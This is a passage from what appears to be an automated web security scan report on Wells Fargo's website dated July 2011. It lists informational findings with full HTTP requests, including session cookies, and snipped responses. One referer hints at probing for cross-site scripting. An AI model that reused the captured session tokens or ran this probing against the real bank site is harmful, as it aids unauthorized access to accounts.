User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000nkyzwrL8tsfz1ZrPhM0ci7Q:13jgrcho1; TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069073761-New%7C1342605073761%3B; s_sess=%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B; uidServiceSelection=gotoBanking; wcp_hawk_accepted=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:51:14 GMT
Server: IBM_HTTP_Server
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=157
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 5810


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
...[SNIP]...

20.14. https://www.wellsfargo.com/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /careers/

Request

GET /careers/ HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:58:53 GMT
Content-length: 8529
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Careers</t
...[SNIP]...

20.15. https://www.wellsfargo.com/com/contact_us_form

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /com/contact_us_form

Request

GET /com/contact_us_form HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/pi_action/rcboLocator
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:40 GMT
Content-length: 11161
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Commercial &#8211;
...[SNIP]...

20.16. https://www.wellsfargo.com/com/rcbo_locator/search

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /com/rcbo_locator/search

Request

GET /com/rcbo_locator/search HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; JSESSIONID=248DE7CA98FB9058FEC7E28C47105F92; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:20 GMT
Content-length: 7190
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Commercial &#8211;
...[SNIP]...

20.17. https://www.wellsfargo.com/com/shareowner_services/services_for_shareholders/investment_plan/hmnfinancial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /com/shareowner_services/services_for_shareholders/investment_plan/hmnfinancial

Request

GET /com/shareowner_services/services_for_shareholders/investment_plan/hmnfinancial HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/search/search?query=xss&searchBtn=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; JSESSIONID=248DE7CA98FB9058FEC7E28C47105F92; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:00 GMT
Content-length: 5240
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>HMN Financial, Inc. ... Wells
...[SNIP]...

20.18. https://www.wellsfargo.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/

Request

GET /help/ HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; JSESSIONID=4EF7C30A5EF0B45DD6E1DC6B95DC840E; BRAND_COOKIE=COB; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 10:06:07 GMT
Content-type: text/html; charset=UTF-8
Content-Length: 13796


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Customer Service f
...[SNIP]...

20.19. https://www.wellsfargo.com/help/faqs/signon_faqs

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/faqs/signon_faqs

Request

GET /help/faqs/signon_faqs HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://online.wellsfargo.com/signon?LOB=CONS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; OB_SO_ORIGIN=LOB=CONS; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:47:10 GMT
Content-type: text/html; charset=UTF-8
Content-Length: 14114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head><title>Wells Fargo Username/Password
...[SNIP]...

20.20. https://www.wellsfargo.com/locator/atm/search

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator/atm/search

Request

GET /locator/atm/search HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/about/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zC